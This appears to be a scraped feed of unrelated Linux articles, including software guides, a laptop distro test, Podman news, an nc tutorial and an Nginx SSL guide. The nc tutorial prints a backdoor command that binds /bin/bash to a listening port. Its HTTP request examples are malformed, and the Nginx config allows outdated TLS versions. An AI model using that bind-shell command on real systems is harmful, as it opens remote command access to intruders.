GameHub – An Unified Library To Put All Games Under One Roof

GameHub is an unified gaming library that allows you to view, install, run and remove games on GNU/Linux operating system. It supports both native and non-native games from various sources including Steam, GOG, Humble Bundle, and Humble Trove etc. The non-native games are supported by Wine, Proton, DOSBox, ScummVM and RetroArch. It also allows you to add custom emulators and download bonus content and DLCs for GOG games. Simply put, Gamehub is a frontend for Steam/GoG/Humblebundle/Retroarch. It can use steam technologies like Proton to run windows gog games. GameHub is free, open source gaming platform written in Vala using GTK+3.  If you’re looking for a way to manage all games under one roof, GameHub might be a good choice.

Installing GameHub

The author of GameHub has designed it specifically for elementary OS. So, you can install it on Debian, Ubuntu, elementary OS and other Ubuntu-derivatives using GameHub PPA.

$ sudo apt install --no-install-recommends software-properties-common
$ sudo add-apt-repository ppa:tkashkin/gamehub
$ sudo apt update
$ sudo apt install com.github.tkashkin.gamehub

GameHub is available in AUR, so just install it on Arch Linux and its variants using any AUR helpers, for example YaY.

$ yay -S gamehub-git

It is also available as AppImage and Flatpak packages in releases page.

If you prefer AppImage package, do the following:

$ wget https://github.com/tkashkin/GameHub/releases/download/0.12.1-91-dev/GameHub-bionic-0.12.1-91-dev-cd55bb5-x86_64.AppImage -O gamehub

Make it executable:

$ chmod +x gamehub

And, run GameHub using command:

$ ./gamehub

If you want to use Flatpak installer, run the following commands one by one.

$ git clone https://github.com/tkashkin/GameHub.git
$ cd GameHub
$ scripts/build.sh build_flatpak

Put All Games Under One Roof

Launch GameHub from menu or application launcher. At first launch, you will see the following welcome screen.

gamehub1

GameHub welcome screen

As you can see in the above screenshot, you need to login to the given sources namely Steam, GoG or Humble Bundle. If you don’t have Steam client on your Linux system, you need to install it first to access your steam account. For GoG and Humble bundle sources, click on the icon to log in to the respective source.

Once you logged in to your account(s), all games from the all sources can be visible on GameHub dashboard.

gamehub2

GameHub Dashboard

You will see list of logged-in sources on the top left corner. To view the games from each source, just click on the respective icon.

You can also switch between list view or grid view, sort the games by applying the filters and search games from the list in GameHub dashboard.

Installing a game

Click on the game of your choice from the list and click Install button. If the game is non-native, GameHub will automatically choose the compatibility layer (E.g Wine) that suits to run the game and install the selected game. As you see in the below screenshot, Indiana Jones game is not available for Linux platform.

Install a game

If it is a native game (i.e supports Linux), simply press the Install button.

gamehub4

If you don’t want to install the game, just hit the Download button to save it in your games directory. It is also possible to add locally installed games to GameHub using the Import option.

GameHub Settings

gamehub5

GameHub Settings window

GameHub Settings window can be launched by clicking on the four straight lines on top right corner.

From Settings section, we can enable, disable and set various settings such as,

  • Switch between light/dark themes.
  • Use Symbolic icons instead of colored icons for games.
  • Switch to compact list.
  • Enable/disable merging games from different sources.
  • Enable/disable compatibility layers.
  • Set games collection directory. The default directory for storing the collection is $HOME/Games/_Collection.
  • Set games directories for each source.
  • Add/remove emulators,
  • And many.

For more details, refer the project links given at the end of this guide.

Cheers!

Resources:

Source

Download Android-x86 8.1-r1

Android-x86 is a port of the Android open source mobile operating system to the x86 (32-bit) architecture, allowing users to run Android applications and replace their existing operating system with the Android OS.

Features at a glance

Key features include a KMS (Kernel Mode Setting) enabled Linux kernel 3.10.x LTS, Wi-Fi support, battery status, V4l2 camera support, G-sensor, bluetooth, suspend, resume, audio though ALSA, and mouse wheel support.

In addition, it supports software mouse cursor, external monitors, debug mode through Busybox, external keyboards, netbook native resolution, better disk installer, as well as external storage automatic mount.

Distributed as a 32-bit Live CD

It is distributed as a single Live CD ISO image that supports only the 32-bit hardware platform. From the boot prompt you can start the live environment with default settings, with the VESA framebuffer, or using the debug mode. It is also possible to install the OS to a local disk drive.

Originally designed as a collection of patches for Android x86 support, the project matured enough in the last years to finally be seriously considered as a good alternative operating system for personal computers.

Supported computers

At the moment, Android-x86 was tested only with the ASUS Eee PC platforms, Viewsonic Viewpad 10 tablet, Dell Inspiron Mini Duo hybrid laptop, Samsung Q1U UMPC device, Viliv S5 handheld PC, as well as with the Lenovo ThinkPad x61 tablet.

At the moment, the project is in active development state. The final release of the project will integrate support for multiple targets, multi-touch touchpad, better power management and multimedia support, OpenGL ES hardware acceleration for Intel and ATI Radeon graphics cards, and OpenGL emulation layer.

Conclusions

In conclusion, if you ever wanted to run Android on a desktop computer or laptop, the Android-x86 does just that. It allows users to install the Android OS or just use it directly from a USB flash drive or optical media on their personal computers.

DOWNLOAD Android-x86 8.1-r1

Source

Testing openSUSE, Manjaro, Debian, Fedora, and Mint Linux distributions on my new laptop

Due to the recent unfortunate demise of a couple of my computers I found myself in need of a new laptop on rather short notice. I found an Acer Aspire 5 on sale at about half price here in Switzerland, so I picked one up. I have been installing a number of Linux distributions on it, with mostly positive results.

First, some information about the laptop itself. It is an Acer Aspire 5 A515-52:

  • Intel Core i5-8265U CPU (Quad-core), 1.6GHz (max 3.4GHz)
  • 8GB DDR4 Memory
  • 256GB SSD + 1TB HD
  • 15.6″ 1920×1080 Display
  • Intel HD Graphics 620
  • Realtek RTL8411 Gigabit Ethernet (RJ45)
  • Intel 802.11ac WiFi
  • Bluetooth 5.0
  • 1xUSB3.1 Type C, 1xUSB3.0 Type A, 2xUSB2.0 Type A
  • HDMI Port
  • SD-Card Reader
  • 36.34 cm x 24.75 cm x 1.8 cm, 1.9 kg

That’s a pretty impressive configuration, especially considering that the regular list price here in Switzerland is CHF 1,199 (~ £945 / €1,065), and it is currently on sale at one of the large electronic stores here for CHF 699 (~ £550, €620).

acer-aspire-5-a515-52-56un.jpg

Acer Aspire 5.

I am particularly pleased and impressed with it having both SSD and HD disks. Also, the screen frame is very narrow, which affects the overall size of the laptop; it is surprisingly small for a 15.6″ unit, it’s actually not much larger than the 14″ ASUS laptop I have been using.

If there is anything negative about this laptop, it’s the all-plastic case, and the fact that the keyboard doesn’t feel terribly solid. I will be carrying it with me on my weekly commute between Switzerland and Amsterdam, so we’ll see how it holds up.

My first task was to load the usual array of Linux distributions on it, which required some adjustments to the firmware configuration (press F2 during boot):

  • F12 Boot Menu Enabled
  • Set Supervisor password
  • Secure Boot Disabled
  • Function Key Behavior Function Key (not Media Key)

A couple of quick comments about these: Enabling F12 on boot lets you select the USB stick or a Linux partition; setting the Supervisor Password is required before you will be able to disable Secure boot; disabling Secure Boot is not necessary for all Linux distributions, but it is for some, and as I am still convinced that for 99% of the people Secure Boot is a ridiculously over-complicated solution for a practically non-existent threat, I choose to make my life easier by disabling it. Note that I only disable Secure Boot, I do not select Legacy Boot. The Function Key Behavior is set to Media Key by default, which is guaranteed to drive me completely insane — the idea is that with this you get the Fn-key functions by default, and you have to press and hold the Fn-key to get normal Function Key operation. See why it drives me crazy?

Next, I wanted to be sure that this laptop was actually going to work properly with Linux before actually installing it. I still have a Linux Mint USB stick handy from my recent Mint 19.1 upgrades, so I plugged that stick into the Aspire 5, crossed my fingers, booted and pressed F12 (not easy to do with my fingers crossed!). The boot select menu came up, offering Windows 10 and… uh… Linpus Lite? That seems more than a bit odd. A bit of poking around convinced me that the “Linpus” option was actually the Mint Live USB stick, so I went ahead and selected that to boot.

To my great pleasure, it came right up, and everything looked good! The display resolution was right, keyboard and mouse worked, wired and wireless networking worked… as far as I could tell, it was all good.

So I was then ready to load my usual selection of Linux distributions. Here is a short summary of what I have done so far:

openSUSE Tumbleweed

Get the latest full snapshot from the downloads directory. Note that this is only an Installation DVD image, it is not a Live image, although those are also available in the same directory. I choose to use the installation image because it has a more complete set of software packages so, for example, I can choose the desktop I want during the installation. I copied the ISO to a USB stick, booted that (with F12 on boot), and the installer came up. The installation was absolutely routine, and took less than 15 minutes. In the disk partitioning stage I put the root filesystem on the SSD and home on the HD.

SEE: How to build a successful developer career (free PDF)

Like many systems using UEFI firmware today, the Aspire 5 doesn’t like to have the boot list modified by the operating system, so even though I checked this after installation was complete, and saw that openSUSE was at the top of the list, it “helps” you by putting Windows back at the top. Grrr. So I had to go back to the firmware configuration (F2 at startup), then in the Boot menu it shows the boot order. Interestingly, openSUSE is correctly identified in this list (it’s not called Linpus Lite). I moved that to the top of the list, saved and rebooted, and openSUSE came right up. Hooray!

Acer Aspire 5 running openSUSE Tumbleweed.

Image: J.A. Watson

Everything seems to be working perfectly. In addition to the major things I had already checked, at this point I went through all of the F-key functions, and they all worked as well: Audio Up/Down/Mute, Brightness Up/Down, Touchpad Disable/Enable, Wireless Disable/Enable, and Suspend/Resume. Good stuff!

Manjaro

The ISO images are in the Manjaro Downloads directory, with different Live images for Xfce, KDE, Cinnamon, and much more. Copy the ISO to a USB stick, and boot that to get the Manjaro Live desktop of your choice. After verifying that everything is working, you can run the installer from the desktop; once again, installation is very easy, I put the root filesystem on the SSD and home on the HD. The entire process took less than 15 minutes. On reboot it brought up openSUSE again, so there are a couple of options here. The obvious one is to press F12 on boot, and select Manjaro from the boot list. Alternatively, you could go back to the firmware setup, where you will find Manjaro somewhere lower in the Boot list, and move it to the top if you want to boot it by default; or let openSUSE come up, and create a new Grub configuration file with grub2-mkconfig, which will then include Manjaro in the list it offers on boot.

Acer Aspre 5 running Manjaro 18.0.2.

Image: J.A. Watson

As with openSUSE, everything seems to work perfectly. So far this is really a treat!

Debian GNU/Linux

There is a link to the latest 64-bit PC network installer on the Debian home page, or you can go to Getting Debian to choose from the full list of installation images. There you will find a variety of Live images, as well as other architectures and Cloud images.

The network installer image is very small (currently less than 300MB), and contains only what is necessary to boot your computer and get the installer running. You have to have an internet connection to perform the installation (duh); after going through the installation dialog it will then download only the packages needed for your selections. This means that the installation process will be longer than one getting everything from a USB stick, but it will only download what it needs (probably less than a complete ISO image), and the installation will get all of the latest packages, so you won’t have a lot of updating to do when it is finished.

On the Aspire 5 using a gigabit wired connection, the installation took less than 30 minutes. When it was done I rebooted, and used F12 to boot Debian.

Acer Aspire 5 running Debian GNU/Linux.

Image: J.A. Watson

This was where I ran into my first significant problem with Linux on this laptop. The touchpad didn’t work. That blasted thing! It’s actually not a touchpad, it is an accursed clickpad! GRRR! I’ve been biting my tongue until now, because at least the stupid thing worked OK (well, as OK as is possible) with the first two distributions I installed, but now surprise, surprise, it doesn’t work.

My intention was not to stay with the current Debian Stable release (stretch), but to go on to Debian Testing. So I decided to just use a USB mouse, and continue the installation in the hope that a later release would take care of this problem.

SEE: Special report: Riding the DevOps revolution (free PDF)

I then also noticed that the Wi-Fi adapter wasn’t recognized (no wireless networks were shown). Sigh. Well, that’s at least not too surprising, because the Aspire 5 has an Intel Wi-Fi adapter, and the drivers for those are not FOSS, so they aren’t included in the base Debian distribution. So I went to /etc/apt/sources.list, and added contrib and non-free to that, then went to the synaptic package manager, searched for iwlwifi and installed that package. After a reboot, the wireless networking was OK (yay).

The next step was to upgrade from Debian Stable to Debian Testing. Once again I edited /etc/apt/sources.list, this time changing every occurrence of stretch to testing. Then I ran a full distribution upgrade; I prefer to do this from the CLI:

apt-get update && apt-get dist-upgrade && apt-get autoremove

This took another 20 minutes or so to run, after which I rebooted and was running Debian GNU/Linux Testing (buster/sid). Unfortunately, the stupid clickpad was still not working. Well, I’ve got better things to do at the moment than fight with that, so I decided to press on with the other installations.

Fedora

Next on my Linux distribution hit list is Fedora Workstation. The ISO image is available from the Workstation Download page, this gets you the 64-bit PC version with the Gnome 3 desktop. Other versions and different desktops are listed in the Fedora 29 Release Announcement.

The Fedora ISO is basically a Live image, although during boot it asks if you want to go to the Live desktop, or simply go directly to the installer. If you choose the Live desktop you can confirm that everything is working (including the idiotic clickpad), and then start the installer from the desktop.

The Fedora installer (anaconda) has been slightly modified with this release. Account setup has been removed from anaconda and given over to the Gnome first-boot sequence. This makes the installation a little bit simpler, I suppose. Anyway, installation once again took less than 15 minutes, and I rebooted (via F12) after it was complete.

Acer Aspire 5 running Fedora 29 Workstation.

Image: J.A. Watson

No surprises this time, everything works, and it looks wonderful (if you like the Gnome 3 desktop).

Linux Mint

The final candidate in this initial batch is Linux Mint. Although I don’t use Mint on a day-to-day basis, it is still the one that I recommend to anyone who asks me about getting started with Linux.

The Mint Downloads page offers Live ISO images for both 32-bit and 64-bit versions, with Cinnamon, MATE or Xfce desktops. I already had the 64-bit Cinnamon version on a USB stick (which I had used for the initial tests of this laptop), so I just used that for the installation. As with Manjaro LInux, the USB stick boots directly to a Live desktop, with the installer on the desktop. The installation was once again easy, and very fast; in about 10 minutes I was rebooting to the installed Linux system.

Acer Aspire 5 running Linux Mint 19.1.

Image: J.A. Watson

Once again, everything works perfectly.

That’s enough for the first group — and honestly, it’s getting a bit boring to keep writing “Installation was smooth and easy, and everything worked perfectly”. So to summarize:

  • Starting with a brand new, out of the box Acer Aspire 5 laptop
  • I completely ignored the pre-installed Windows 10 operating system
  • I modified the UEFI firmware configuration to enable Boot Select (F12), and disable UEFI Secure Boot
  • I have successfully installed five different Linux distributions
  • I only ran into two significant problems, both on the same distribution; one could be fixed with some small changes, while the other I have not yet found a solution or work-around for
  • On the other four distributions, everything in the Aspire 5 works perfectly
  • I am already using this laptop as my primary system

I will continue with a few other distributions over the next week, and will report success or problems in a few days.

PREVIOUS AND RELATED COVERAGE

Linux Mint 19.1 Tessa: Hands-on with an impressive new release

A new Linux Mint release is always good news. I have tried this one as a fresh installation, as an upgrade from 19.1 Beta and as an upgrade from both 19 and 18.3. Here are the results.

Hands-on with the new Raspberry Pi 3 Model A+ and new Raspbian Linux release

Finally, the little brother to the Pi 3 Model B+ is available. I’ve got one, and I’ve been trying it out along with the latest release of the Raspbian Linux operating system.

Raspberry Pi PoE HAT is back on sale again

After a problem with the PoE HAT for the Raspberry Pi 3B+, an updated version is now available.

Raspberry Pi: Hands-on with Kali, openSUSE, Fedora and Ubuntu MATE Linux

There has been considerable progress made since the last time I tried a variety of Linux distributions other than Raspbian on the Raspberry Pi, so I’ve given four of them another try.

Raspberry Pi: Hands-on with the updated Raspbian Linux

I have installed the new Raspbian 2018-10-09 release from scratch on some systems, and upgraded existing installations on others. Here are my experiences, observations and comments.

Raspbian Linux distribution updated, but with one unexpected omission

New distribution images for the Raspberry Pi operating system are available, including bug fixes, security updates and new features, and one notable disappearance.

Kali Linux for Vagrant: Hands-on

The developers at Kali Linux have released a Vagrant distribution of their latest version. Here is a look at that release – and at the Vagrant tool itself.

Raspberry Pi 3 Model A+ review: A $25 computer with a lot of promise (TechRepublic)

Get the lowdown on how well the latest Raspberry Pi board performs with benchmarks and the full specs.

How to start your smart home: Home automation, explained (CNET)

Starting a smart home doesn’t have to be scary. Here are the basics.

Source

Linux Today – Red Hat Advances Container Technology With Podman 1.0

Red Hat’s competitive Docker container effort hits a major milestone with the release of Podman 1.0, which looks to provide improved performance and security for containers.

Podman

Red Hat announced the 1.0 release of its open-source Podman project on Jan. 17, which provides a fully featured container engine.

In Podman 1.0, Red Hat has integrated multiple core security capabilities in an effort to enable organizations run containers securely. Among the security features are rootless containers and enhanced user namespace support for better container isolation.

Containers provide a way for organizations to run applications in a virtualized approach on top of an existing operating system. With the 1.0 release, Red Hat is now also positioning Podman as an alternative to the Docker Engine technology for application container deployment.

“We felt the sum total of its features, as well as the project’s performance, security and stability, made it reasonable to move to 1.0,” Scott McCarty, product manager of containers at Red Hat, told eWEEK. “Since Podman is set to be the default container engine for the single-node use case in Red Hat Enterprise Linux 8, we wanted to make some pledges about its supportability.”

McCarty explained that for clusters of container nodes, the CRI-O technology within the Red Hat OpenShift Container Platform will be the default. The OpenShift Container Platform is Red Hat’s distribution of the Kubernetes container orchestration platform.

Red Hat already integrated a pre-1.0 version of Podman in its commercially supported Red Hat Enterprise Linux (RHEL) 7.6 release in October 2018. McCarty said that both RHEL 7 and RHEL 8 will be updated to include Podman 1.0. RHEL 8 is currently in private beta.

OpenShift

CRI-O is a Kubernetes container runtime and is at the core of Red Hat’s OpenShift. CRI-O reached its 1.0 milestone in October 2017. McCarty said Podman was originally designed to be used on OpenShift Nodes to help manage containers/storage under CRI-O, but it has grown into so much more.

“First and foremost, Podman is designed to be used by humans—it’s easy to use and has a very intuitive command-line experience,” McCarty said.

A user interacts with Podman at the node level—this includes finding, running, building and sharing containers on a single node. Even in clusters of thousands of container hosts, McCarty said it’s useful to have a feature rich tool like Podman available to troubleshoot and to tinker with individual nodes.

“One main challenge to adopting Kubernetes is the learning curve on the Kubernetes YAML, which defines running containers,” McCarty said.

Kubernetes YAML provides configuration information to get containers running. To help onramp users to Red Hat OpenShift, McCarty said Podman has the “podman generate kube” command. With that feature, a Podman user can interactively create a pod on the host, which Podman can then create and export as Kubernetes-compatible YAML.

“This YAML can then be used by OpenShift to create the same pod or container inside of Kubernetes, in any cluster or even multiple times within the same cluster, stamping out many copies anywhere the application is needed,” McCarty explained. “The user doesn’t even have to know how to write Kubernetes YAML, which is a big help for people new to the container orchestration engine.”

Security

One of the key attributes of Podman is the improved security. A challenge with some container deployments is that they are deployed with root access privileges, which can lead to risk.

On Jan. 14, security vendor CyberArk reported one such privileged container risk on the Play-with-Docker community site that could have potentially enabled an attacker to gain access to the underlying host. With containers, the basic idea is that the running containers are supposed to be isolated, but if a user has root privileges, that isolation can potentially be bypassed.

Podman has the concept of rootless containers that do not require elevated privileges to run. McCarty said that to use rootless containers, the user doesn’t need to do anything special.

Another key concept with Podman is that it does not require a new system daemon to run. Dan Walsh, consulting software engineer at Red Hat, explained that if a user is going to run a single service as a container, then having to set up another service to just run the container is a big overhead.

“Forcing all of your containers to run through a single daemon forces you to have a least common denominator for default security for your containers,” Walsh told eWEEK. “By separating out the containers engines into separate tools like CRI-O, Buildah and Podman, we can give the proper level of security for each engine.”

Walsh added that Podman also enables users to run each container in a separate user namespace, providing further isolation. From a security auditing perspective, he noted that the “Podman top” command can be used to actually reveal security information about content running within the container.

Podman Usage

Red Hat is seeing a lot of usage for Podman as a replacement for the Docker Engine for running containers in services on hosts, according to McCarty.

The Fedora and openSUSE communities seem to be taking the lead on adopting Podman, McCarty said, but Red Hat also seen it packaged and used in many other distributions, including Ubuntu, Debian, Arch and Gentoo, to name a few.

“Podman essentially operates at native Linux speeds, since there is no daemon getting in the way of handling client/server requests,” he said.

Related Stories:

Source

Getting started with Sandstorm, an open source web app platform

Learn about Sandstorm, the third in our series on open source tools that will make you more productive in 2019.

Sand dunes

There seems to be a mad rush at the beginning of every year to find ways to be more productive. New Year’s resolutions, the itch to start the year off right, and of course, an “out with the old, in with the new” attitude all contribute to this. And the usual round of recommendations is heavily biased towards closed source and proprietary software. It doesn’t have to be that way.

Here’s the third of my picks for 19 new (or new-to-you) open source tools to help you be more productive in 2019.

Sandstorm

Being productive isn’t just about to-do lists and keeping things organized. Often it requires a suite of tools linked to make a workflow go smoothly.

Sandstorm main window

Sandstorm is an open source collection of packaged apps, all accessible from a single web interface and managed from a central console. You can host it yourself or use the Sandstorm Oasis service—for a per-user fee.

Sandstorm App admin panel

Sandstorm has a marketplace that makes it simple to install the apps that are available. It includes apps for productivity, finance, note taking, task tracking, chat, games, and a whole lot more. You can also package your own apps and upload them by following the application-packaging guidelines in the developer documentation.

Sandstorm Grains

Once installed, a user can create grains—basically containerized instances of app data. Grains are private by default and can be shared with other Sandstorm users. This means they are secure by default, and users can chose what to share with others.

Sandstorm authentication options

Sandstorm can authenticate from several different external sources as well as use a “passwordless” email-based authentication. Using an external service means you don’t have to manage yet another set of credentials if you already use one of the supported services.

In the end, Sandstorm makes installing and using supported collaborative apps quick, easy, and secure.

Source

Download PDF Split and Merge Linux 4.0.1

PDF Split and Merge iconEasy split and merge PDF files on Linux

PDF Split and Merge project is an easy-to-use tool that provides functions to split and merge PDF files or subsections of them.

To install, just unzip the archive into a directory, double click the pdfsam-x.x.jar file or open a terminal a type the following command in the folder where you’ve extracted the archive:

java -jar /pathwhereyouunzipped/pdfsam-x.x.jar

PDF split PDF merge Merge PDF subsection PDF Split Merge Pdfsam

New in PDF Split and Merge 2.2.2:

  • Added recent environments menu
  • New MSI installer suitable for silent and Active Directory installs (feature request #2977478) (bug #3383859)
  • Console: regexp matching on the bookmarks name when splitting by bookmark level
  • Added argument skipGui that can be passed to skip the GUI restore

Read the full changelog

This download is provided to you FREE of charge.

Source

10GbE Linux Networking Performance Between CentOS, Fedora, Clear Linux & Debian

For those curious how the 10 Gigabit Ethernet performance compares between current Linux distributions, here are some benchmarks we ramp up more 10GbE Linux/BSD/Windows benchmarks. This round of testing was done on two distinctly different servers while testing CentOS, Debian, Clear Linux, and Fedora.

This is the first of several upcoming 10GbE test comparisons. For those article we are testing some of the popular enterprise Linux distributions while follow-up articles will also be looking at some other distros as well as Windows Server and FreeBSD/DragonFlyBSD. CentOS 7, Debian 9.6, Clear Linux rolling, and Fedora Server 29 were the operating systems tested for this initial round.

The first server tested was the Dell PowerEdge R7425 with dual AMD EPYC 7601 processors, 512GB of DDR4 system memory, and Samsung 860 500GB SSD. The PowerEdge R7425 server features dual 10GbE RJ45 Ethernet ports using a Broadcom BCM57417 NetXTreme-E 10GBase-T dual-port controller. For this testing a CAT7 cable was connecting the server to the 10GbE switch.

The second server tested was the Tyan S7106 1U server with two Xeon Gold 6138 processors, 96GB of DDR4 memory, Samsung 970 EVO SSD, and for the 10GbE connectivity a PCIe card with QLogic cLOM8214 controller was used while connected via a 10G SPF+ DAC cable. This testing isn’t meant for comparing the performance between these distinctly different servers but rather for looking at the 10GbE performance across the multiple Linux distributions.

All four distributions were cleanly installed on each system and tested in their stock configuration with the default kernels and all stable release updates applied.

The system running all of the server processes for the networking benchmarks was an AMD Ryzen Threadripper 2920X system with Gigabyte X399 AORUS Gaming 7 motherboard, 16GB of RAM, 240GB Corsair Force MP510 NVMe SSD, and using a 10GbE PCIe network card with QLogic cLOM8214 controller. That system was running Ubuntu 18.04 LTS.
Source

NC command (NCAT) for beginners

NC command is for performing maintenance/diagnosis tasks related to network . It can perform operations like read,write or data redirections over the network, similar to how you can use cat command to manipulate files on Linux system. Nc command can be used as a utility to scan ports, monitoring or can also act as a basic TCP proxy.

Organizations can utilize it to review their network security, web servers, telnet servers, mail servers and so on, by checking the ports that are opened and then secure them. NC command can also be used to capture information being sent by system.

Recommended Read : Top 7 commands for Linux Network Traffic Monitoring

Also Read : Important PostgreSQL commands you should know

Now let’s discuss how we can use NC command with some examples,


Examples for NC command


Connect to a remote server

Following example shows how we can connect to remote server with nc command,

$ nc 10.10.10.100 80

here, 10.10.10.100 is IP of the server we want to connect to & 80 is the port number for the remote server. Once connected we can perform some other functions like we can get the total page content with

GET/HTTP/1.1

or fetch page name,

GET/HTTP/1.1

or we can get banner for OS fingerprinting with the following,

HEAD/HTTP/1.1

This will let us know what software & version is being utilised to run the webserver.


Listen to inbound connection requests

To check a server for incoming connection request on a port number, use following example

$ nc -l 8080

Now NC is in listening mode to check port 8080 for incoming connection requests. Now listening mode will keep on running, until terminated manually. But we can address this option ‘w’ for NC,

$ nc -w 10 8080

here, 10 means NC will listen for connections for 10 seconds only.


Connecting to UDP ports

By default, we can connect to TCP ports with NC but to listen to incoming request made to UDP ports we have to use option ‘u’ ,

$ nc -l -u 55


Using NC for Port forwarding

With option ‘c’ of NC, we can redirect a port to another. Complete example is,

$ nc -u -l 8080 -c ‘ nc -u -l 8090’

here, we have forwarded all incoming requests from port 8080 to port 8090.


Using NC as Proxy server

To use NC command as a proxy, use

$ nc – l 8080 | nc 10.10.10.200 80

here, all incoming connections to port 8080 will be diverted to 10.10.10.200 server on port 80.

Now with the above command, we only created a one way passage. To create a return passage or 2 way communication channel, use the following commands,

$ mkfifo 2way

$ nc – l 8080 0<2way | nc 10.10.10.200 80 1>2way

Now you will have the capacity to send and get information over nc proxy.


Using NC as chat tool

Another utility that NC command can serve is as a chat tool. Yes we can also use it as a chat. To create it, first run the following command on one server,

$ nc – l 8080

Than to connect on remote machine, run

$ nc 10.10.10.100 8080

Now we can start conversation using the terminal/CLI.


Using NC to create a system backdoor

Now this one is the most common application of NC & is mostly used by hackers a lot. Basically this creates a backdoor to system which can be exploited by hackers (you should not be doing it, its wrong).
One must be aware of this as to safeguard against this kind of exploits.

Following command can be used to create a backdoor,

$ nc -l 5500 -e /bin/bash

here, we have attached port 5500 to /bin/bash, which can now be connected from a remote machine to execute the commands,

$ nc 10.10.10.100 5500


Force server to remain up

Server will stop listening for connection once a client connection has been terminated. But with option ‘k’, we can force a server to remain running, even when no client is connected.

$ nc -l -k 8080


We now end this tutorial on how to use NC command, please feel free to send in any questions or queries you have regarding this article.

Source

Simple guide to configure Nginx reverse proxy with SSL

A reverse proxy is a server that takes the requests made through web i.e. http & https, then sends them to backend server (or servers). A Backend server can be a single or group of application server like Tomcat, wildfly or Jenkins etc or it can even be another web server like Apache etc.

We have already discussed how we can configure a simple http reverse proxy with Nginx. In this tutorial, we will discuss how we can configure a Nginx reverse proxy with SSL. So let’s start with the procedure to configure Nginx reverse proxy with SSL,

Recommended Read : The (in)complete Guide To DOCKER FOR LINUX

Also Read : Beginner’s guide to SELinux

Pre-requisites

– A backend server: For purpose of this tutorial we are using an tomcat server running on localhost at port 8080. If want to learn how to setup a apache tomcat server, please read this tutorial.

Note:- Make sure that application server is up when you start proxying the requests.

– SSL cert : We would also need an SSL certificate to configure on the server. We can use let’s encrypt certificate, you can get one using the procedure mentioned HERE. But for this tutorial, we will using a self signed certificates, which can be created by running the following command from terminal,

$ openssl req -x509 -nodes -days 365 -newkey rsa:2048 -keyout /etc/nginx/certs/cert.key -out /etc/nginx/certs/cert.crt

You can also read more about self signed certificates HERE.

Next step on configuring nginx reverse proxy with ssl will be nginx installation,


Install Nginx


Ubuntu

Nginx is available with default Ubuntu Repositories. So simple install it using the following command,

$ sudo apt-get update && sudo apt-get install nginx

CentOS/RHEL

We need to add some repos for installing nginx on CentOS & we have created a detailed ARTICLE HERE for nginx installation on CentOS/RHEL.

Now start the services & enable it for boot,

# systemctl start nginx

# systemctl enable nginx

Now to check the nginx installation, we can open web browser & enter the system ip as url to get a default nginx webpage, which confirms that nginx is working fine.


Configuring Nginx reverse proxy with SSL

Now we have all the things we need to configure nginx reverse proxy with ssl. We need to make configurations in nginx now, we will using the default nginx configuration file i.e. ‘/etc/nginx/conf.d/default.conf’.

Assuming this is the first time we are making any changes to configuration, open the file & delete or comment all the old file content, then make the following entries into the file,

# vi /etc/nginx/conf.d/default.conf

server {

listen 80;

return 301 https://$host$request_uri;

}

server {

listen 443;

server_name linuxtechlab.com;

ssl_certificate /etc/nginx/ssl/cert.crt;

ssl_certificate_key /etc/nginx/ssl/cert.key;

ssl on;

ssl_session_cache builtin:1000 shared:SSL:10m;

ssl_protocols TLSv1 TLSv1.1 TLSv1.2;

ssl_ciphers HIGH:!aNULL:!eNULL:!EXPORT:!CAMELLIA:!DES:!MD5:!PSK:!RC4;

ssl_prefer_server_ciphers on;

access_log /var/log/nginx/access.log;

location / {

proxy_set_header Host $host;

proxy_set_header X-Real-IP $remote_addr;

proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;

proxy_set_header X-Forwarded-Proto $scheme;

proxy_pass http://localhost:8080;

proxy_read_timeout 90;

proxy_redirect http://localhost:8080 https://linuxtechlab.com;

}

}

Once all the changes have been made, save the file & exit. Now before we restart the nginx service to implement the changes made, we will discuss the configuration that we have made , section by section,

Section 1

server {

listen 80;

return 301 https://$host$request_uri;

}

here, we have told that we are to listen to any request made to port 80 & then redirect it to https,

Section 2

listen 443;

server_name linuxtechlab.com;

ssl_certificate /etc/nginx/ssl/cert.crt;

ssl_certificate_key /etc/nginx/ssl/cert.key;

ssl on;

ssl_session_cache builtin:1000 shared:SSL:10m;

ssl_protocols TLSv1 TLSv1.1 TLSv1.2;

ssl_ciphers HIGH:!aNULL:!eNULL:!EXPORT:!CAMELLIA:!DES:!MD5:!PSK:!RC4;

ssl_prefer_server_ciphers on;

Now these are some of the default nginx ssl options that we are using, which tells what kind of protocol version, SSL ciphers to support by nginx web server,

Section 3

location / {

proxy_set_header Host $host;

proxy_set_header X-Real-IP $remote_addr;

proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;

proxy_set_header X-Forwarded-Proto $scheme;

proxy_pass http://localhost:8080;

proxy_read_timeout 90;

proxy_redirect http://localhost:8080 https://linuxtechlab.com;

}

}

Now this section tells about proxy & where the incoming requests are sent once they come in. Now that we have discussed all the configurations, we will check & then restart the nginx service,

To check the nginx , run the following command,

# nginx -t

Once we have configuration file as OKAY, we will restart the nginx service,

# systemctl restart nginx

That’s it, our nginx reverse proxy with ssl is now ready. Now to test the setup, all you have to do is to open web browser & enter the URL. We should now be redirected to the apache tomcat webpage.

This completes our tutorial on how we can configure nginx reverse proxy with ssl, please do send in any questions or queries regarding this tutorial using the comment box below.

Source

Download GStreamer Linux 1.15.1

GStreamer is an open source library, a complex piece of software that acts as a multimedia framework for numerous GNU/Linux operating systems, as well as Android, OpenBSD, Mac OS X, Microsoft Windows, and Symbian OSes.

Features at a glance

Key features include a comprehensive core library, intelligent plugin architecture, extended coverage of multimedia technologies, as well as extensive development tools, so you can easily add support for GStreamer in your applications.

It is the main multimedia backend for a wide range of open source projects, raging from audio and video playback applications, such as Totem (Videos) from the GNOME desktop environment, and complex video and audio editors.

Additionally, the software features very high performance and low latency, thanks to its extremely lightweight data passing technology, as well as global inter-stream (audio/video) synchronization through clocking.

Comprises of multiple codec packs

The project is comprised of several different packages, also known as code packs, which can be easily installed on any GNU/Linux distribution from their default software repositories all at once or separately. They are as follows: GStreamer Plugins Base, GStreamer Plugins Good, GStreamer Plugins Bad, and GStreamer Plugins Ugly.

GStreamer is a compact core library that allows for random pipleline constructions thanks to its graph-based structure, based on the GLib 2.0 object model library, which can be used for object-oriented design and inheritance.

Uses the QoS (Quality of Service) technology

In order to guarantee the best possible audio and video quality under high CPU load, the project uses QoS (Quality of Service) technology. In addition, it provides transparent and trivial construction of multi-threaded pipelines.

Thanks to its simple, stable and clean API (Application Programming Interface), developers can easily integrate it into their applications, as well as to create plugins that will extend its default functionality. It also provides them with a full featured debugging system.

